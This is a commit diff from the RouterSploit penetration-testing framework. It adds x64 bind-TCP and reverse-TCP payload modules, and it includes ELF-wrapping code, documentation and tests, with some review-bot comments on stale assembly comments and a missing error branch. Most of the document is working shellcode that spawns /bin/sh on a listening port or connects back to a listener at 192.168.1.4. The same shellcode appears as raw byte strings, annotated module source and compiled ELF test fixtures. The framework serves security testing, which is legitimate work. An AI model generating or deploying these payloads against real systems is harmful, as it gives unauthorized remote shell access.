Unverified Commit 4e77c24a by Marcin Bury Committed by GitHub

Payloads x64 (#455)

* Adding x64 payloads

* Fixing x64 bind and reverse payloads, adding tests and docs
parent 5eeb6e9e
## Description
Module generates payload that creates interactive tcp bind shell for X64 architecture.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/x64/bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. Module generates x64 bind shell tcp payload
## Scenarios
```
rsf > use payloads/x64/bind_tcp
rsf (X64 Bind TCP) > set rport 4321
[+] rport => 4321
rsf (X64 Bind TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
"\xc7\x04\x24\x02\x00\x10\xe1\x48\x89\xe6\x6a\x10\x5a\x6a\x31"
"\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
"\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
)
```
## Description
Module generates payload that creates interactive tcp reverse shell for X64 architecture.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/x64/reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. Module generates x64 reverse shell tcp payload
## Scenarios
```
rsf > use payloads/x64/reverse_tcp
rsf (X64 Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (X64 Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (X64 Reverse TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
"\xb9\x02\x00\x10\xe1\xc0\xa8\x01\x04\x51\x48\x89\xe6\x6a\x10"
"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
)
```
......@@ -72,6 +72,16 @@ ARCH_ELF_HEADERS = {
b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08"
b"\x00\x80\x04\x08\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00"
b"\x00\x10\x00\x00"
),
Architectures.X64: (
b"\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x02\x00\x3e\x00\x01\x00\x00\x00\x78\x00\x40\x00\x00\x00\x00\x00"
b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x40\x00\x38\x00\x01\x00\x00\x00\x00\x00\x00\x00"
b"\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00"
b"\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42"
b"\x00\x10\x00\x00\x00\x00\x00\x00"
)
}
......@@ -155,14 +165,25 @@ class ArchitectureSpecificPayload(BasePayload):
def generate_elf(self, data):
elf = self.header + data
if self.bigendian:
p_filesz = pack(">L", len(elf))
p_memsz = pack(">L", len(elf) + len(data))
else:
p_filesz = pack("<L", len(elf))
p_memsz = pack("<L", len(elf) + len(data))
if elf[4] == 1: # ELFCLASS32 - 32 bit
if self.bigendian:
p_filesz = pack(">L", len(elf))
p_memsz = pack(">L", len(elf) + len(data))
else:
p_filesz = pack("<L", len(elf))
p_memsz = pack("<L", len(elf) + len(data))
content = elf[:0x44] + p_filesz + p_memsz + elf[0x4c:]
elif elf[4] == 2: # ELFCLASS64 - 64 bit
if self.bigendian:
p_filesz = pack(">Q", len(elf))
p_memsz = pack(">Q", len(elf) + len(data))
else:
p_filesz = pack("<Q", len(elf))
p_memsz = pack("<Q", len(elf) + len(data))
content = elf[:0x60] + p_filesz + p_memsz + elf[0x70:]
content = elf[:0x44] + p_filesz + p_memsz + elf[0x4c:]
return content
@staticmethod
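Review bot: If `elf[4]` is neither 1 nor 2, `content` is never assigned and the `return content` line fails with an UnboundLocalError that hides the real cause, an unsupported or malformed class byte in `self.header`. Add an explicit branch before the return: `else:` / `raise ValueError(f"unsupported ELF class {elf[4]}")`; the class byte is available from `self.header` alone, so the check could even run before the payload is appended. A docstring stating that the method rewrites p_filesz and p_memsz of the single program header (offsets 0x44–0x4c for ELFCLASS32, 0x60–0x70 for ELFCLASS64, with p_memsz = p_filesz + len(data)) would make the hard-coded offsets readable. The same note belongs on the new X64 entry of `ARCH_ELF_HEADERS` in the earlier hunk, whose 0x41/0x42 filler bytes at 0x60–0x70 are the placeholders this method overwrites.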
......
from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import (
ArchitectureSpecificPayload,
Architectures,
BindTCPPayloadMixin,
)
class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = {
"name": "X64 Bind TCP",
"description": "Creates interactive tcp bind shell for X64 architecture.",
"authors": (
"ricky", # metasploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
)
}
architecture = Architectures.X64
def generate(self):
bind_port = utils.convert_port(self.rport)
return (
b"\x6a\x29" + # pushq $0x29
b"\x58" + # pop %rax
b"\x99" + # cltd
b"\x6a\x02" + # pushq $0x2
b"\x5f" + # pop %rdi
b"\x6a\x01" + # pushq $0x1
b"\x5e" + # pop %rsi
b"\x0f\x05" + # syscall
b"\x48\x97" + # xchg %rax,%rdi
b"\x52" + # push %rdx
b"\xc7\x04\x24\x02\x00" + # movl $0xb3150002,(%rsp)
bind_port + # port
b"\x48\x89\xe6" + # mov %rsp,%rsi
b"\x6a\x10" + # pushq $0x10
b"\x5a" + # pop %rdx
b"\x6a\x31" + # pushq $0x31
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x6a\x32" + # pushq $0x32
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x48\x31\xf6" + # xor %rsi,%rsi
b"\x6a\x2b" + # pushq $0x2b
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x48\x97" + # xchg %rax,%rdi
b"\x6a\x03" + # pushq $0x3
b"\x5e" + # pop %rsi
b"\x48\xff\xce" + # dec %rsi
b"\x6a\x21" + # pushq $0x21
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x75\xf6" + # jne 33 <dup2_loop>
b"\x6a\x3b" + # pushq $0x3b
b"\x58" + # pop %rax
b"\x99" + # cltd
b"\x48\xbb\x2f\x62\x69\x6e\x2f" + # movabs $0x68732f6e69622f,%rbx
b"\x73\x68\x00" + #
b"\x53" + # push %rbx
b"\x48\x89\xe7" + # mov %rsp,%rdi
b"\x52" + # push %rdx
b"\x57" + # push %rdi
b"\x48\x89\xe6" + # mov %rsp,%rsi
b"\x0f\x05" # syscall
)
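Review bot: The instruction comment on `b"\xc7\x04\x24\x02\x00" + bind_port` is copied from a fixed disassembly and no longer describes the bytes emitted: `movl $0xb3150002,(%rsp)` names a port that never appears, since the low half-word is AF_INET and the high half-word is spliced in from `bind_port`. Replace it with `# movl $imm32,(%rsp) -- sin_family=AF_INET, sin_port=rport (network order)`; the same stale comment, `movabs $0x100007fb3150002,%rcx`, sits on the `reverse_port`/`reverse_ip` line of the reverse_tcp module added in this commit. `generate()` also has no docstring; one sentence saying it returns the raw shellcode with `rport` placed into the sockaddr_in, and that it relies on `utils.convert_port` producing exactly two network-order bytes — to be confirmed against that helper, which is outside the hunk — would spare the next reader a byte count.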
from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import (
ArchitectureSpecificPayload,
Architectures,
ReverseTCPPayloadMixin,
)
class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = {
"name": "X64 Reverse TCP",
"description": "Creates interactive tcp reverse shell for X64 architecture.",
"authors": (
"ricky", # metasploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
)
}
architecture = Architectures.X64
def generate(self):
reverse_ip = utils.convert_ip(self.lhost)
reverse_port = utils.convert_port(self.lport)
return (
b"\x6a\x29" + # pushq $0x29
b"\x58" + # pop %rax
b"\x99" + # cltd
b"\x6a\x02" + # pushq $0x2
b"\x5f" + # pop %rdi
b"\x6a\x01" + # pushq $0x1
b"\x5e" + # pop %rsi
b"\x0f\x05" + # syscall
b"\x48\x97" + # xchg %rax,%rdi
b"\x48\xb9\x02\x00" + # movabs $0x100007fb3150002,%rcx
reverse_port + # port
reverse_ip + # ip
b"\x51" + # push %rcx
b"\x48\x89\xe6" + # mov %rsp,%rsi
b"\x6a\x10" + # pushq $0x10
b"\x5a" + # pop %rdx
b"\x6a\x2a" + # pushq $0x2a
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x6a\x03" + # pushq $0x3
b"\x5e" + # pop %rsi
b"\x48\xff\xce" + # dec %rsi
b"\x6a\x21" + # pushq $0x21
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x75\xf6" + # jne 27 <dup2_loop>
b"\x6a\x3b" + # pushq $0x3b
b"\x58" + # pop %rax
b"\x99" + # cltd
b"\x48\xbb\x2f\x62\x69\x6e\x2f" + # movabs $0x68732f6e69622f,%rbx
b"\x73\x68\x00" + #
b"\x53" + # push %rbx
b"\x48\x89\xe7" + # mov %rsp,%rdi
b"\x52" + # push %rdx
b"\x57" + # push %rdi
b"\x48\x89\xe6" + # mov %rsp,%rsi
b"\x0f\x05" # syscall
)
from routersploit.modules.payloads.x64.bind_tcp import Exploit
# bind tcp payload with rport=4321
bind_tcp = (
b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
b"\xc7\x04\x24\x02\x00\x10\xe1\x48\x89\xe6\x6a\x10\x5a\x6a\x31"
b"\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
b"\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
b"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
b"\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
)
# elf x64 bind tcp
elf_x64_bind_tcp = (
b"\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x3e\x00\x01\x00\x00\x00\x78\x00\x40\x00\x00\x00"
b"\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x38\x00\x01\x00\x00\x00"
b"\x00\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
b"\x40\x00\x00\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x24"
b"\x01\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
b"\xc7\x04\x24\x02\x00\x10\xe1\x48\x89\xe6\x6a\x10\x5a\x6a\x31"
b"\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
b"\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
b"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
b"\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
assert payload.generate_elf(bind_tcp) == elf_x64_bind_tcp
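Review bot: The expected `elf_x64_bind_tcp` literal is opaque: nothing tells a reader that it is the 0x78-byte X64 header followed by `bind_tcp`, with p_filesz and p_memsz at 0x60–0x70 patched to 0xce and 0x124. A comment above the literal saying so, plus two structural asserts next to the blob comparison, `assert elf_x64_bind_tcp[0x78:] == bind_tcp` and `assert int.from_bytes(elf_x64_bind_tcp[0x60:0x68], "little") == 0x78 + len(bind_tcp)`, would document the layout and pin the size fields independently of the hard-coded bytes. The reverse_tcp test file in this commit has the same opaque literal and would benefit from the same treatment.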
from routersploit.modules.payloads.x64.reverse_tcp import Exploit
# reverse tcp with lhost=192.168.1.4 lport=4321
reverse_tcp = (
b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
b"\xb9\x02\x00\x10\xe1\xc0\xa8\x01\x04\x51\x48\x89\xe6\x6a\x10"
b"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
b"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
b"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
)
# elf x64 reverse tcp
elf_x64_reverse_tcp = (
b"\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x3e\x00\x01\x00\x00\x00\x78\x00\x40\x00\x00\x00"
b"\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x38\x00\x01\x00\x00\x00"
b"\x00\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
b"\x40\x00\x00\x00\x00\x00\xc2\x00\x00\x00\x00\x00\x00\x00\x0c"
b"\x01\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
b"\xb9\x02\x00\x10\xe1\xc0\xa8\x01\x04\x51\x48\x89\xe6\x6a\x10"
b"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
b"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
b"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
assert payload.generate_elf(reverse_tcp) == elf_x64_reverse_tcp